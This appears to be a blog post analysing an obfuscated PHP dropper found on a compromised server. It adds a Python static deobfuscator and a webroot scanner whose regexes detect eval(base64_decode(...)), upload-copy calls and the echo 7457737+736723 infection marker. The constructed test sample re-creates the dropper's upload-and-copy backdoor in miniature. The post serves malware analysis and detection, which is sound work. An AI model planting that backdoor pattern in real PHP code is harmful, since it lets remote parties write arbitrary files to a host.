I came across the bit of code posted below today while browsing Stack Overflow. The user who posted the question was asking what this bit of code actually did. He knew it was malicious because it had turned up on his server without his knowledge, and it was obfuscated. Unfortunately the question was marked as off topic: “Questions asking us to recommend or find a book, tool, software library, tutorial or other off-site resource are off-topic”.
A few users commented that they wouldn’t take the time to deobfuscate the code, that he shouldn’t bother and should just remove it from the server, and so on. I thought the question was closed rather prematurely, because it is indeed related to programming. It’s also no more time consuming to reverse engineer this than it is to answer most other questions on Stack Overflow. I don’t subscribe to the philosophy that if you find a short snippet of obfuscated code on your server, you remove it without even attempting to see what it’s doing.
Since this snippet is very short, and easily deobfuscated, here’s how it’s done in a few steps.
Step 0: Original Obfuscated Code
Step 1: Human Readable Obfuscated Code
Things become significantly easier to read once we simply add some tabs and line breaks. Go through the code and break it at the semicolons so that each statement sits on its own line. After that, add some comments of your own noting what you can already make out.
Step 2: Quick & Dirty Decoder
In order to decode this entirely without wasting too much time, just use common sense. We’ll decode the script with itself: comment out the malicious calls we don’t want to run, and add echos to see what these base64 strings really are. Essentially we’re just creating a clean printout of all the
Here’s what we see when we run our janky little decoder.
~/Lab$ php ./test.php
8194460 base64_decode copy id up up file tmp_name file file
Step 3: Deobfuscated Script
Reading our decoder’s printout from the top down, it’s easy to replace each obfuscated string with its decoded value. After doing so, here’s what we wind up with. The whole script is rather short compared to all the initial gibberish.
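The same “decode the script with itself” idea can be done statically, without ever running the sample. The script below is an added example, not the author’s test.php and not the file from the question; it runs against a constructed PHP snippet written in the same style (arithmetic marker, base64 literals, one literal parked in a variable, an eval of decoded code). Every base64_decode() of a literal is replaced with the decoded string, the marker sum is recorded, and eval( is turned into echo( so a decoded payload could only ever be printed, never executed.

```python
import base64
import re

# Constructed sample in the style of the snippet discussed above; it is NOT
# the file from the Stack Overflow question. It has the arithmetic marker,
# base64 literals fed straight to base64_decode(), one literal parked in a
# variable first, and an eval() of decoded code.
SAMPLE = (
    '<?php echo 7457737+736723;'
    '$x=base64_decode("Y29weQ==");'
    '$y="aWQ=";'
    'if(isset($_POST[base64_decode($y)])){'
    '$f=$_FILES[base64_decode("ZmlsZQ==")];'
    '$x($f[base64_decode("dG1wX25hbWU=")],$_POST[base64_decode($y)]);'
    'eval(base64_decode("ZWNobyAndXAnOw=="));}'
)

B64 = r"[A-Za-z0-9+/]+={0,2}"
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*(['\"])(" + B64 + r")\2\s*;")
CALL_LIT_RE = re.compile(r"base64_decode\(\s*(['\"])(" + B64 + r")\1\s*\)")
CALL_VAR_RE = re.compile(r"base64_decode\(\s*(\$\w+)\s*\)")
MARKER_RE = re.compile(r"echo\s+(\d+)\s*\+\s*(\d+)\s*;")


def decode_literal(lit):
    """Strict base64 decode; None if the text is not valid base64 / UTF-8."""
    try:
        return base64.b64decode(lit, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def php_quote(s):
    """Emit s as a single-quoted PHP string literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def deobfuscate(src):
    """One static pass of 'decode the script with itself'.

    Returns (rewritten PHP, report). The report lists every decoded string in
    the order it was met, the integer the marker echo would print, and how
    many eval() calls were turned into echo() so the code can never run.
    """
    report = {"strings": [], "markers": [], "evals": 0}

    # 1. Variables that just hold a base64 literal, e.g. $y="aWQ=";
    consts = {}
    for var, _quote, lit in ASSIGN_RE.findall(src):
        decoded = decode_literal(lit)
        if decoded is not None:
            consts[var] = decoded

    # 2. base64_decode("...") with the literal inline.
    def sub_literal(m):
        decoded = decode_literal(m.group(2))
        if decoded is None:
            return m.group(0)          # not base64 after all; leave it alone
        report["strings"].append(decoded)
        return php_quote(decoded)

    out = CALL_LIT_RE.sub(sub_literal, src)

    # 3. base64_decode($var) where $var was captured in step 1.
    def sub_variable(m):
        var = m.group(1)
        if var not in consts:
            return m.group(0)
        report["strings"].append(consts[var])
        return php_quote(consts[var])

    out = CALL_VAR_RE.sub(sub_variable, out)

    # 4. The "is PHP running?" marker: record the sum an attacker's probe
    #    would look for in the response.
    for a, b in MARKER_RE.findall(out):
        report["markers"].append(int(a) + int(b))

    # 5. Same trick as the quick & dirty decoder: eval() becomes echo(), so a
    #    decoded payload is printed instead of executed.
    report["evals"] = out.count("eval(")
    out = out.replace("eval(", "echo(")
    return out, report


if __name__ == "__main__":
    rewritten, rep = deobfuscate(SAMPLE)
    print(rewritten)
    print(rep)
```

Real samples usually nest (the decoded payload is itself obfuscated), so in practice you feed the rewritten output back through deobfuscate() until the report comes back empty. Anything that fails strict base64 validation is left untouched rather than guessed at.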
It doesn’t tell us a whole lot about what the malware actually does on the victim’s system, because all we can see is that it lets a remote party copy files onto the host and execute them. What you can tell, though, is that if this was on your server you’d absolutely need to be looking for other malicious files, because this was there to facilitate their transfer.
This code looks like it has infected a lot of PHP applications out in the wild. A simple Google query for echo 7457737+736723; reveals many WordPress, Drupal, OpenCart, and various other PHP applications infected. It’s likely installed via an infected plugin built for any of those systems, vulnerabilities in them, or issues with the hosts on which they’re running.
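If the marker is what Google finds, it is also what you can grep your own webroot for. The scanner below is an added example, not a tool from the original post; it walks a directory of PHP files and reports the indicators this write-up exposed: the plain-text arithmetic marker (which has to stay readable, because the attacker’s probe reads its output), base64 going straight into eval(), an upload being copied to a caller-chosen path, and very long base64 blobs. The sample files it scans are constructed here for the demo, not real infected files, and the threshold of 200 base64 characters is an assumption.

```python
import os
import re
import shutil
import tempfile

# Indicators drawn from the write-up: the plain-text arithmetic marker that
# has to survive obfuscation (the attacker's probe reads its output), base64
# text going straight into eval(), an uploaded file being copied to an
# attacker-chosen path, and unusually long base64 blobs (200+ chars is an
# assumed threshold, tune it for your code base).
INDICATORS = {
    "arith-marker": re.compile(r"echo\s+\d+\s*\+\s*\d+\s*;"),
    "eval-base64": re.compile(
        r"eval\s*\(\s*@?(?:(?:gzinflate|gzuncompress|str_rot13)\s*\(\s*@?)?base64_decode\s*\("
    ),
    "upload-copy": re.compile(r"(?:copy|move_uploaded_file)\s*\(\s*\$_FILES\b"),
    "long-b64": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}

# Constructed sample files (not real infected files): a marker-only probe
# file like the on.php mentioned in the post, a dropper-style file, and a
# clean WordPress-style index.php.
SAMPLES = {
    "on.php": "<?php echo 7457737+736723;?>",
    "uploads/cache.php": '<?php echo 7457737+736723;eval(@base64_decode("ZWNobyAndXAnOw=="));',
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
}


def scan_source(text):
    """Names of the indicators that fire on one file's contents, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a webroot; return {relative path (with '/'): [indicators]} for hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
            except OSError:
                continue                      # unreadable file: skip, keep going
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def demo():
    """Write SAMPLES into a throwaway directory, scan it, clean up, return hits."""
    root = tempfile.mkdtemp(prefix="phpscan-")
    try:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, found in sorted(demo().items()):
        print(f"{rel}: {', '.join(found)}")
```

Note the limitation: in the obfuscated form the words copy, file and tmp_name only exist as base64, so the upload-copy pattern fires on a decoded copy, not on the dropper as found. The marker and the eval(base64_decode(...)) shape are the signals that survive obfuscation, which is why they are the ones worth sweeping a host for.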
Through a search for the code on GitHub I was able to find an infected Russian store. Within their repository there is a file titled on.php which simply contains <?php echo 7457737+736723;?>. I presume this signifies that the host is infected successfully and that PHP is running: requesting the file returns 8194460, the same number our decoder printed first. After searching through their commit log I can see that the directory once contained additional obfuscated files.
While I’d like to take the time to clean these files up as well, I haven’t yet done so. It seems that accesson.php is the one most people are talking about.
Here is the original question.